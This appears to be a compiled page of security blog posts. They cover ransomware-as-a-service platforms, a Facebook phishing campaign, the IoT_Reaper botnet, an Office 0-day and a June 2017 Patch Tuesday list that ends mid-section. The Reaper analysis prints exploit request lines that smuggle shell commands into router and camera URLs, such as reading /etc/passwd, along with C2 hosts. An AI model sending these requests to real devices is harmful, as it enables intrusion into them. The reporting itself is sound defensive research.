ZLAB MALWARE ANALYSIS REPORT: RANSOMWARE-AS-A-SERVICE PLATFORMS

19.4.2018 Malware blog

Introduction
Over the years, the diffusion of darknets has created new illegal business models. Along with classic illegal goods such as drugs and payment card data, other services appeared in the criminal underground, including hacking services and malware development. New platforms allow crooks without any technical skills to create their own ransomware and spread it.

Ransomware is malicious code that infects a victim's machine and blocks or encrypts its files, demanding payment of a ransom. Once installed on a victim machine, it searches for and targets sensitive files and data, including financial records, databases and personal files. Ransomware is designed to make the victim's machine unusable, leaving the user only two options: pay the ransom with no guarantee of recovering the original files, or disconnect the PC from the Internet and reformat it.

Ransomware history
The first ransomware was born in 1989, when 20,000 floppy disks were dispatched as “AIDS Information-introductory Diskettes.” After 90 reboots, the software hid directories and encrypted the names of files on the customer's computer, demanding a ransom of $189. The payment had to be made by depositing the requested amount at a post office box in Panama.

Many years later, in May 2005, GpCode, TROJ.RANSOM.A, Archiveus, Krotten, and others appeared in the threat landscape.

With the advent of anonymous payment methods such as Bitcoin at the end of 2008, ransomware adopted new ways of collecting payments.

Many ransomware families such as CryptoLocker, TeslaCrypt, and Locky compromised an impressive number of systems worldwide, but the WannaCry Ransomware Attack is currently considered the most devastating of all cyber-attacks.

Within a few hours of its discovery, the malware had infected more than 230,000 machines by exploiting a vulnerability in the SMB protocol. Despite its unexpected worm-like behavior, WannaCry encrypted user files using the classic methods but asked for a payment of $300.

The samples related to the attacks of the last ten years can be grouped into two categories:

Locker-ransomware: is ransomware that locks users out of their devices
Crypto-ransomware: is ransomware that encrypts files, directories, and hard drives
The first type was used between 2008 and 2011 and was abandoned because it was quite simple to remove the infection without paying the ransom. In fact, locker-ransomware has a weakness: it shows a window that denies access to the computer, but the lock itself is easy to bypass.

The second type does not have this problem because crypto-malware directly hits the users’ files and denies the victim usage of the system. Obviously, the user cannot access the information contained in the encrypted files.

Subsequent ransomware families use the same encryption approach as the second category, but they combine it with advanced distribution efforts and development techniques designed to ensure evasion and anti-analysis, as Locky and WannaCry attest.

Obviously, creating ransomware requires specific, advanced skills, but the great interest of criminal organizations in the extortion model implemented by this kind of malware pushed the creation of new services that allow crooks to build their own ransomware without any particular knowledge. Welcome to the Ransomware-as-a-Service (RaaS) business model.

Ransomware-as-a-Service
The rise of the RaaS business model gives wannabe criminals an effortless way to launch a cyber-extortion campaign without any technical expertise, and it is flooding the market with new ransomware strains.

Ransomware-as-a-Service is a profitable model for both malware sellers and their customers. With this approach, malware sellers can acquire new infection vectors and potentially reach victims they could not reach through conventional approaches such as email spamming or compromised websites. RaaS customers can easily obtain ransomware via RaaS portals, simply by configuring a few features and distributing the malware to unwitting victims.

Naturally, RaaS platforms cannot be found on the Clearnet; they are hidden in the dark side of the Internet, the Dark Web.

Surfing the dark web through unconventional search engines, you can find several websites that offer RaaS. Each one provides different features for its ransomware, allowing users to select the file extensions targeted during the encryption phase, the ransom demanded of the victim, and other technical functionality the malware will implement.

Furthermore, beyond RaaS platforms, custom malicious software can be purchased through crime forums or websites where one can hire a hacker to create one's personal malware. Historically, this commerce has always existed, but it specialized in cyber-attacks such as espionage, account hacking and website defacement. Only when hackers understood it could be profitable did they start to provide this specific service.

The supply of this type of service is offered substantially in two ways: hiring someone to write malware with the requirements defined by the customer or using a Ransomware-as-a-Service platform.

RaaSberry
RaaSberry provides customized ransomware packages that are ready to be distributed. The packages are pre-compiled with a Bitcoin address provided by the customers, and the platform creators do not receive any form of payment from your victims.

Once the ransomware is executed on your victim's computer, it encrypts every file type that was specified when you created it. It examines all local drives and mapped network drives and encrypts the files with a unique 256-bit AES key generated on the fly. The AES key is then encrypted using your unique RSA key and uploaded.
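The per-victim key handling described here is the standard hybrid-encryption pattern: generate a fresh symmetric key, encrypt the files with it, then wrap that key with the operator's public RSA key. The sketch below illustrates only the flow; it uses a repeating-key XOR as a toy stand-in for AES-256 and textbook RSA with tiny demo primes, none of which comes from the actual RaaSberry code.

```python
import secrets

def xor_stream(data: bytes, key: bytes) -> bytes:
    """Toy stand-in for AES-256: repeating-key XOR (symmetric)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# 1. Generate a fresh 256-bit file-encryption key per victim.
aes_key = secrets.token_bytes(32)            # 32 bytes == 256 bits

# 2. Encrypt the victim's file with the symmetric key.
plaintext = b"quarterly-report.xlsx contents"
ciphertext = xor_stream(plaintext, aes_key)

# 3. Wrap the symmetric key with the operator's RSA public key
#    (textbook RSA on tiny demo primes; Python 3.8+ for pow(e, -1, m)).
p, q, e = 61, 53, 17                         # demo primes and public exponent
n = p * q
d = pow(e, -1, (p - 1) * (q - 1))            # private exponent
wrapped = [pow(b, e, n) for b in aes_key]    # "upload" this, discard aes_key

# 4. After payment, the operator unwraps the key and the victim decrypts.
recovered_key = bytes(pow(c, d, n) for c in wrapped)
assert recovered_key == aes_key
assert xor_stream(ciphertext, recovered_key) == plaintext
```

A real implementation would use AES-GCM and OAEP-padded RSA with a 2048-bit or larger key, but the structure (generate, encrypt, wrap, upload) is the same.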

Upon completion, the desktop wallpaper will be changed to an image with instructions for paying the ransom. A text file is also created in each folder where there are encrypted files with instructions. The instructions are available in English, Spanish, Mandarin, Hindi, Arabic, Portuguese, Russian, Japanese, German, Italian, Vietnamese, Korean, French, Tamil, and Punjabi.

After the victim has paid, the AES key is provided back to the program to allow decryption. Many ransomware programs require the victim to download a separate decryptor, but RaaSberry has built-in decryption once the Command and Control server provides the AES key. If you are not subscribed to the Command and Control service, you can still offer a decryption service via email by manually decrypting the victim's AES key. The website has several sections: About, Login, Register and Support. The About section describes how you can create your personal ransomware.

A set of statistics about the ransomware campaign, tracking the number of infections, the number of paying victims and the corresponding earnings, is available in the user's personal section.

In this dashboard, you can purchase new packages that include, for each plan, the same ransomware but a different subscription length to Command and Control. As shown in the following figure, there are several plans:

Plastic: One-month Command and Control subscription – $60
Bronze: Three-month Command and Control subscription – $150
Silver: Six-month Command and Control subscription – $250
Gold: One-year Command and Control subscription – $400
Platinum: Three-year Command and Control subscription – $650

Once users have registered on the platform and purchased a package, the platform assigns them a personal Bitcoin address. They can monitor statistics about their ransomware campaign and check their earnings.

Furthermore, you can ask the creators of the platform for assistance by sending an ad hoc email.

Ranion
Another platform that offers a similar service is Ranion. The novelty is that the Ranion team declares that the Command and Control of their “Fully UnDetectable” ransomware is hosted in the darknet. The site is continuously updated by its operators.

On their website, the Ranion team shows an example of the Command and Control dashboard. In the next figure, we can observe the subscription period and its expiry date, as well as the infected machines classified by computer ID, victim username, operating system, IP address, date of infection, number of encrypted files and the corresponding encryption key.

In this dashboard, users can purchase new packages. As shown in the next figure, there are two plans offering the same ransomware but different subscription periods to the Command and Control dashboard, at correspondingly different prices.

The next figure shows the Bitcoin address to which the package's price must be sent and the email address to contact, together with the further information required:

Chosen package
Your bitcoin address used to send money
Your own Bitcoin address to receive money from your Clients
Your price to receive from your Clients
Your email address to get contacted by your Clients
If you want to keep track of the IPs of your Clients (enabled by default)
Optional additions

The Ransomware Decrypter is shown in the next figure. It is used by victims to decrypt their files with the key sent by the criminals once the ransom has been paid. Pressing the “decrypt my files” button starts the decryption process.

EarthRansomware
Another RaaS platform is EarthRansomware. The following image shows the home page of the site. Customers can log in to the platform after buying their personal ransomware by contacting the EarthRansomware team via email.

The website includes a section that provides a step-by-step tutorial for its services.

Unlike the previous RaaS platforms, this one offers a fixed-rate service at a price of 0.3 BTC. When the customer pays that amount to the Bitcoin address indicated in the email, he obtains the credentials to enter his personal section.


In this area of the site, users can customize their ransomware settings:

Amount of bitcoins you require
Your email address
First payment deadline – Last payment deadline
Bitcoin address

Once a system is infected, the malware shows a ransom note notifying victims of the payment deadline and giving instructions for paying the ransom.

Redfox ransomware
Redfox is a unique Ransomware-as-a-Service platform because, unlike the others, it is hosted on the Clearnet. According to the description provided by its development team, this ransomware is the most advanced and customizable malware of its kind. RedFox encrypts all user files and shared drives using the Blowfish algorithm.

The webpage states that the Command and Control, hosted in the Tor network, allows users to choose the ransom amount, the payment mode and the payment deadline, personalize the ransom note, and configure other technical features. The RaaS also lets its customers apply binders, packers, and crypters to make the sample resistant to analysis.

The website does not contain examples or tutorials about using the Command and Control. However, users can pay and download everything needed to set up the criminal infrastructure.

Createyourownransomware
A totally free platform, found on the darknet, is Createyourownransomware. Its website lets users download ready-to-go ransomware by filling in only three boxes in a form:

the Bitcoin address to which you want to receive your “money cut.”
the ransom amount
a simple captcha.
The “money cut” corresponds to 90% of the ransom amount; the remaining 10% is the fee that the RaaS administrators keep for providing the service.
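The split is simple arithmetic; with a hypothetical ransom of 0.2 BTC the division would look like this (the ransom amount is invented, only the 90/10 split comes from the text):

```python
ransom_btc = 0.2                                     # hypothetical ransom set by the user
affiliate_cut = round(ransom_btc * 0.90, 8)          # 90% "money cut" for the user
service_fee = round(ransom_btc - affiliate_cut, 8)   # 10% kept by the RaaS admins

print(affiliate_cut, service_fee)  # 0.18 0.02
```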

Once the user has filled out the form, the platform instantly builds a new sample and shows a link to download the malware. Furthermore, a second webpage shows some statistics about the ransomware campaign, such as the number of infected machines and the number of ransoms paid.

The user interface of the RaaS, unlike the previous platforms, is very minimal and provides only a few features.

Datakeeper
Datakeeper, along with GandCrab and Saturn, is one of the most recent RaaS platforms to appear in the threat landscape. Ransomware created through these platforms infected many machines at the beginning of 2018, demonstrating the increasing interest in Ransomware-as-a-Service platforms. Currently, only the Datakeeper service has not been blocked by law enforcement.

When users register on the website, they can configure their ransomware by choosing from a set of features. This platform appears to be one of the most complete because it lets users specify which file extensions to encrypt.

The Datakeeper team holds 0.5 bitcoin as a service fee for each infection.

In the “Additional files” section, users can download the utility to decrypt the ciphered files.

The following figure shows an example ransom note dropped on the victim’s machine.


Facebook Phishing Targeted iOS and Android Users from Germany, Sweden and Finland

6.11.2017 F-Secure blog
Two weeks ago, a co-worker received a message in Facebook Messenger from his friend. Based on the message, it seemed that the sender was telling the recipient that he was part of a video in order to lure him into clicking it.

Facebook Messenger message and the corresponding Facebook Page

The shortened link initially redirected to Youtube.com, but was later changed to redirect to yet another shortened link, po.st:

Changes in the Picsee short link

The po.st shortened link supported two types of redirection: the original link and smart links. If the device accessing the URL was running iOS or Android, it was redirected to the utm.io shortened link; otherwise it was redirected to smarturl.it.
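The device-dependent routing behaves like a simple user-agent switch. The sketch below is a hypothetical reconstruction of that logic, not code recovered from the campaign; the URL constants come from this post, but the function itself is ours.

```python
# Hypothetical reconstruction of the po.st "smart link" routing:
# mobile (iOS/Android) visitors get the phishing page, everyone
# else is funneled into the ad-affiliate chain.
PHISHING_LINK = "hxxp://utm[.]io/290459"       # served to iOS/Android
AD_CHAIN_LINK = "hxxp://smarturl[.]it/02xuof"  # everyone else

def pick_redirect(user_agent: str) -> str:
    """Route a visitor based on mobile-OS markers in the User-Agent."""
    ua = user_agent.lower()
    if "iphone" in ua or "ipad" in ua or "android" in ua:
        return PHISHING_LINK
    return AD_CHAIN_LINK

assert pick_redirect("Mozilla/5.0 (iPhone; CPU iPhone OS 11_0)") == PHISHING_LINK
assert pick_redirect("Mozilla/5.0 (Windows NT 10.0; Win64; x64)") == AD_CHAIN_LINK
```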

The short link with the smart links

So iOS and Android users were served the following phishing page:

Phishing page for utm.io short link

Users on all other devices ended up at the smarturl.it link, which went through several redirections that eventually led to contenidoviral.net. That page contained an ad-affiliate URL redirecting to mobusi.com, a mobile advertising company.

Phishing page’s ad-affiliate URL

Based on the data from the links, the campaign began on October 15th, initially targeting mostly Swedish users. On the 17th it moved on to Finnish users, and from the 19th onwards it mostly went after German users.

The total number of clicks for the entire campaign reached almost 200,000, where close to 80% of the visitors were from Germany, Sweden and Finland.

Statistics from po.st tracking page

The campaign ran for two weeks with the main motive of stealing Facebook credentials from iOS and Android users. The cybercriminals used the stolen credentials to spread the malicious links and subsequently gather more credentials. While harvesting credentials, they also attempted to earn from the remaining non-iOS and non-Android users through ad fraud.

This practice of using email addresses in place of unique usernames as account credentials creates a big opportunity for phishers. Just by launching this Facebook phishing campaign, they can mass-harvest email and password pairs that can later be used in secondary attacks, such as gaining access to other systems or services with a bigger monetary value, thanks to password reuse.

We highly recommend that affected users change their passwords as soon as possible, including on other systems and services where the same compromised password was used.

URLs:

hxxp://lnk[.]pics/19S3Y
hxxp://lnk[.]pics/18JDK
hxxp://lnk[.]pics/196OV
hxxp://lnk[.]pics/18XH7
hxxp://lnk[.]pics/196PN
hxxp://lnk[.]pics/19LBP
hxxp://lnk[.]pics/18YZV
hxxp://lnk[.]pics/18QZW
hxxp://lnk[.]pics/196PA
hxxp://lnk[.]pics/19XK7
hxxp://lnk[.]pics/18HFX
hxxp://lnk[.]pics/19S3L
hxxp://lnk[.]pics/18J7S
hxxp://lnk[.]pics/19XKF
hxxp://lnk[.]pics/19K94
hxxp://lnk[.]pics/19LBW
hxxp://pics[.]ee/188g7
hxxp://pics[.]ee/18cdl
hxxp://po[.]st/ORyChA
hxxp://smarturl[.]it/02xuof
hxxp://utm[.]io/290459
hxxp://at.contenidoviral[.]net


RickRolled by none other than IoTReaper

6.11.2017 F-secure blog
IoT_Reaper overview
IoT_Reaper, or Reaper for short, is a Linux bot targeting embedded devices such as webcams and home routers. Reaper is somewhat loosely based on the Mirai source code, but instead of trying a set of default admin credentials, it attempts to exploit the devices' HTTP control interfaces.

It uses a range of vulnerabilities (ten in total as of this writing) from the years 2013-2017. All of them have been fixed by the vendors, but how well the actual devices are updated is another matter. According to some reports, we are talking about a ballpark figure of millions of infected devices.

In this blog post, we just want to add some minor details to the good reports already published by Netlab 360 [1], CheckPoint [2], Radware [3] and others.

Execution overview
When Reaper enters a device, it takes some fairly aggressive actions to disrupt the device's monitoring capabilities. For example, it simply deletes the “/var/log” folder with “rm -rf”.
Another action is to disable the Linux watchdog daemon, if present, by sending a specific IOCTL to the watchdog device:

watchdog

After the initialization, the Reaper spawns a set of processes for different roles:

Poll the command and control servers for instructions
Start a simple status reporting server listening on port 23 (telnet)
Start an apparently unused service on port 48099
Start scanning for vulnerable devices
All the child processes run with a random name, such as “6rtr2aur1qtrb”.

String obfuscation
Reaper's spawned child processes use a trivial form of string obfuscation that is surprisingly effective. The main process doesn't use any obfuscation, but every child process applies this simple scheme when it starts executing. Basically, it's a single-byte XOR (0x22), but the way the data is arranged in memory makes it a bit challenging to connect the data to the code.

The main process allocates a table on the heap and copies the XOR-encoded data into it. Later, when a child process needs a particular encoded string, it decodes it on the heap and references the decoded data by a numeric index. After use, the data is encoded back to its obfuscated form.
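Single-byte XOR is its own inverse, which is why one routine serves both to decode a string on demand and to re-encode it after use. A minimal Python equivalent of the scheme (the 0x22 key is from the sample; the example string is ours):

```python
def xor22(data: bytes) -> bytes:
    """Single-byte XOR with key 0x22; applying it twice restores the input."""
    return bytes(b ^ 0x22 for b in data)

encoded = xor22(b"/var/log")   # as the string would sit in the heap table
decoded = xor22(encoded)       # decoded on demand by a child process
assert decoded == b"/var/log"  # re-encoding after use is the same operation
```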

The following screenshot is a good presentation of the procedure:

decrypt

Command and Control
Reaper periodically polls a fixed set of C2 servers:

weruuoqweiur.com, e.hl852.com, e.ha859.com and 27.102.101.121

The control messages and replies are transmitted over clear-text HTTP, and the beacons use the following format:

/rx/hx.php?mac=%s%s&type=%s&port=%s&ver=%s&act=%d
The protocol is very simple: there are basically only two major functions, shutdown or execution of an arbitrary payload via the system shell.
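For illustration, filling the beacon template with made-up field values yields a request path like the one below; only the format string itself comes from the sample.

```python
# Beacon format string observed in the sample; all field values are invented.
BEACON_FMT = "/rx/hx.php?mac=%s%s&type=%s&port=%s&ver=%s&act=%d"

path = BEACON_FMT % ("de:ad:be:ef", ":00:01", "mips", "23", "1.0", 0)
print(path)  # /rx/hx.php?mac=de:ad:be:ef:00:01&type=mips&port=23&ver=1.0&act=0
```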

Port scanning
One of the child processes starts scanning for vulnerable victims. In addition to randomly generated IP addresses, Reaper scans nine hard-coded addresses for some unknown reason. Each address is probed first with a set of apparently random-looking ports, and then with a set of more familiar ones:

80, 81, 82, 83, 84, 88, 1080, 3000, 3749, 8001, 8060, 8080, 8081, 8090, 8443, 8880, 10000

In fact, the random-looking ports are just byte-swapped versions of the ports in the list above. For example, 8880 = 0x22B0 turns into 0xB022 = 45090. The reason for this is still unknown.

It is possible that the author was simply lazy and left out some endianness-handling code, or maybe it is some other error in the programming logic. Some IoT devices are big-endian, so the ports need to be byte-swapped before they can be used in socket code.
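The byte-swap relationship is easy to check: each of the “random-looking” ports is the 16-bit byte swap of one of the familiar ports listed above.

```python
def swap16(port: int) -> int:
    """Swap the two bytes of a 16-bit port number (endianness flip)."""
    return ((port & 0xFF) << 8) | (port >> 8)

FAMILIAR_PORTS = [80, 81, 82, 83, 84, 88, 1080, 3000, 3749,
                  8001, 8060, 8080, 8081, 8090, 8443, 8880, 10000]

assert swap16(8880) == 45090  # 0x22B0 -> 0xB022, as noted above
assert all(swap16(swap16(p)) == p for p in FAMILIAR_PORTS)
```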

Screenshot of the hard-coded list of ports:

ports

This is the list of hard-coded IP-addresses:

217.155.58.226
85.229.43.75
213.185.228.42
218.186.0.186
103.56.233.78
103.245.77.113
116.58.254.40
201.242.171.137
36.85.177.3

Exploitation
If Reaper finds a promising victim, it then tries to send an HTTP-based exploit payload to the target. A total of ten different exploits have been observed so far, all related to the HTTP-based control interfaces of IoT devices. Here's a list of the targeted vulnerabilities and the HTTP requests associated with them:

1 – Unauthenticated Remote Command Execution for D-Link DIR-600 and DIR-300

Exploit URI: POST /command.php HTTP/1.1

2 – CVE-2017-8225: exploitation of custom GoAhead HTTP server in several IP cameras

GET /system.ini?loginuse&loginpas HTTP/1.1

3 – Exploiting Netgear ReadyNAS Surveillance unauthenticated Remote Command Execution vulnerability

GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%%27echo+nuuo+123456;%%27 HTTP/1.1

4 – Exploitation of Vacron NVR through Remote Command Execution

GET /board.cgi?cmd=cat%%20/etc/passwd HTTP/1.1

5 – Exploiting an unauthenticated RCE to list user accounts and their clear text passwords on D-Link 850L wireless routers

POST /hedwig.cgi HTTP/1.1

6 – Exploiting a Linksys E1500/E2500 vulnerability caused by missing input validation

POST /apply.cgi HTTP/1.1

7 – Exploitation of Netgear DGN DSL modems and routers through an unauthenticated Remote Command Execution

GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&curpath=/&currentsetting.htm=1cmd=echo+dgn+123456 HTTP/1.1

8 – Exploitation of AVTech IP cameras, DVRs and NVRs through an unauthenticated information leak and authentication bypass

GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* HTTP/1.1

9 – Exploiting DVRs running a custom web server with the distinctive HTTP Server header ‘JAWS/1.0’.

GET /shell?echo+jaws+123456;cat+/proc/cpuinfo HTTP/1.1

10 – Unauthenticated remote access to D-Link DIR-645 devices

POST /getcfg.php HTTP/1.1

Other details and The Roll
Reaper makes connectivity checks against the Google DNS server 8.8.8.8 and won't run without this connectivity.
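A connectivity gate like that can be implemented in a few lines. The sketch below is our own illustration of the idea (the port, timeout, and function name are ours), not code lifted from the bot.

```python
import socket

def has_connectivity(host: str = "8.8.8.8", port: int = 53,
                     timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to the given host/port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# A bot using such a gate would refuse to run when this check fails.
```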
There is no hard-coded payload functionality in this variant. The bot is supposedly receiving the actual functionality, like DDoS instructions, over the control channel.
The code contains an unused rickrolling link (yes, I was rickrolled)
Output from IDAPython tool that dumps encoded strings (rickrolling is the second one):

rickroll

Sample hash
Analysis on this post is based on a single version of the Reaper (md5:37798a42df6335cb632f9d8c8430daec)


New Office 0day (CVE-2017-11826) Exploited in the Wild

15.10.2017
On September 28, 2017, Qihoo 360 Core Security (@360CoreSec) detected an in-the-wild attack that leveraged CVE-2017-11826, an Office 0-day vulnerability present in all supported Office versions. The attack targeted only a limited set of customers. The attacker embedded malicious .docx files in RTF files. Through reverse analysis of the sample's C&C, we found that the attack was initiated in August and that its launch can be dated back to September. It was in this time window that the vulnerability was exploited as a 0-day.

Qihoo 360 Core Security was the first security vendor to share the details of the vulnerability and coordinated with Microsoft to disclose the news, as well as a timely patch that resolved the Office 0-day vulnerability within a week.

The latest version of 360 security products can detect and prevent exploitation of this vulnerability. In the meantime, we also strongly advise users to apply the Microsoft patch in time.

The In-the-Wild Attack
The attack that Qihoo 360 detected in the wild is initiated with RTF (Rich Text Format) files. The RTF file contains highly targeted phishing subfiles that lure the user into opening it. The attacker triggered remote arbitrary code execution using Microsoft Word tags and their corresponding attributes. The payload delivery follows the procedure shown below. In this process, the execution code took advantage of a DLL hijack vulnerability in a well-known security product. Afterwards, a remote Trojan aimed at stealing sensitive data was installed on the victims' devices.

Summary & Security Advice
Upon detection of this 0-day vulnerability, 360 released a hot patch, available in the latest updates, that enabled 360 users to avoid attacks exploiting this new Office vulnerability before Patch Tuesday. Attacks using Office 0-day vulnerabilities against ordinary users have been increasing since the beginning of 2017.

We would like to remind all users not to open any unknown Office files. Organizations and enterprises should also be aware of this new 0-day and be more cautious of related malicious behavior. It is also highly recommended to update your 360 security software to protect your devices against potential attacks.

Acknowledgement
Thanks to Yang Kang, Ding Maoyin, Song Shenlei, Qihoo 360 Core Security and Microsoft Active Protections Program (MAPP) for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us in resolving this issue.

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11826


Microsoft Patch Tuesday – June 2017

11.7.2017 Symantec Vulnerability blog

This month the vendor has patched 94 vulnerabilities, 18 of which are rated Critical.
Hello, welcome to this month's blog on the Microsoft patch release.

As always, customers are advised to follow these security best practices:

Install vendor patches as soon as they are available.
Run all software with the least privileges required while still maintaining functionality.
Avoid handling files from unknown or questionable sources.
Never visit sites of unknown or questionable integrity.
Block external access at the network perimeter to all key systems unless specific access is required.
Microsoft's summary of the June 2017 releases can be found here:
https://portal.msrc.microsoft.com/en-us/security-guidance

This month's update covers vulnerabilities in:

Microsoft Internet Explorer
Microsoft Edge
Microsoft Office
Microsoft Hyper-V
Microsoft Uniscribe
Windows Graphics
Microsoft Windows
The following is a breakdown of the issues being addressed this month:

Cumulative Security Update for Microsoft Internet Explorer and Edge

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8496) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8497) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8517) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8520) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8522) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8524) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Memory Corruption Vulnerability (CVE-2017-8548) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Remote Code Execution Vulnerability (CVE-2017-8549) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8499) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8519) MS Rating: Important

A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. This vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8521) MS Rating: Important

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Memory Corruption Vulnerability (CVE-2017-8523) MS Rating: Important

A security bypass vulnerability exists when Microsoft Edge fails to correctly apply Same Origin Policy for HTML elements present in other browser windows. An attacker can exploit this issue to trick a user into loading a page with malicious content.

Microsoft Browser Information Disclosure Vulnerability (CVE-2017-8529) MS Rating: Important

An information disclosure vulnerability exists when affected Microsoft scripting engines do not properly handle objects in memory. The vulnerability could allow an attacker to detect specific files on the user's computer.

Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8530) MS Rating: Important

A security bypass vulnerability that affects Microsoft Edge.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8547) MS Rating: Important

A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. This vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8555) MS Rating: Important

A security bypass vulnerability exists when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker can exploit this issue to trick a user into loading a web page with malicious content.

Microsoft Edge Information Disclosure Vulnerability (CVE-2017-8498) MS Rating: Moderate

An information disclosure vulnerability exists in Microsoft Edge that allows JavaScript XML DOM objects to detect installed browser extensions. To exploit the vulnerability, in a web-based attack scenario, an attacker could host a malicious website in an attempt to make a user visit it.

Microsoft Edge Information Disclosure Vulnerability (CVE-2017-8504) MS Rating: Low

An information disclosure vulnerability exists when the Microsoft Edge Fetch API incorrectly handles a filtered response type. An attacker could use the vulnerability to read the URL of a cross-origin request.

Cumulative Security Update for Microsoft Office

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-0260) MS Rating: Important

A remote code execution vulnerability exists when Office improperly validates input before loading dynamic link library (DLL) files. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8506) MS Rating: Important

A remote code execution vulnerability exists when Office improperly validates input before loading dynamic link library (DLL) files. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Memory Corruption Vulnerability (CVE-2017-8507) MS Rating: Important

A remote code execution vulnerability exists in the way that Microsoft Outlook parses specially crafted email messages. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Security Feature Bypass Vulnerability (CVE-2017-8508) MS Rating: Important

A security bypass vulnerability exists in Microsoft Office software when it improperly handles the parsing of file formats. The security bypass by itself does not allow arbitrary code execution.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8509) MS Rating: Important

A remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8510) MS Rating: Important

A remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8511) MS Rating: Important

A remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8512) MS Rating: Important

A remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft PowerPoint Remote Code Execution Vulnerability (CVE-2017-8513) MS Rating: Important

A remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft SharePoint Reflective XSS Vulnerability (CVE-2017-8514) MS Rating: Important

A cross-site scripting vulnerability exists in Microsoft SharePoint because it fails to sufficiently sanitize user-supplied input. An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server.

Microsoft Outlook for Mac Spoofing Vulnerability (CVE-2017-8545) MS Rating: Important

A spoofing vulnerability exists when Microsoft Outlook for Mac does not sanitize HTML or treat it in a safe manner. An attacker who successfully tricked the user could gain access to the user's authentication information or login credentials.

Microsoft SharePoint XSS Vulnerability (CVE-2017-8551) MS Rating: Important

A privilege escalation vulnerability exists when SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. Successful exploits may allow an attacker to perform cross-site scripting attacks.

Cumulative Security Update for Microsoft Windows Hyper-V

Hypervisor Code Integrity Elevation of Privilege Vulnerability (CVE-2017-0193) MS Rating: Important

A privilege escalation vulnerability exists when Windows Hyper-V instruction emulation fails to properly enforce privilege levels. An attacker who successfully exploited this issue could gain elevated privileges on a target guest operating system.

Cumulative Security Update for Skype for Business

Skype for Business Remote Code Execution Vulnerability (CVE-2017-8550) MS Rating: Critical

A remote code execution vulnerability exists when Skype for Business and Microsoft Lync Servers fail to properly sanitize specially crafted content. An authenticated attacker who successfully exploited this issue could execute HTML and JavaScript content in the Skype for Business or Lync context.

Cumulative Security Update for Microsoft Windows Uniscribe
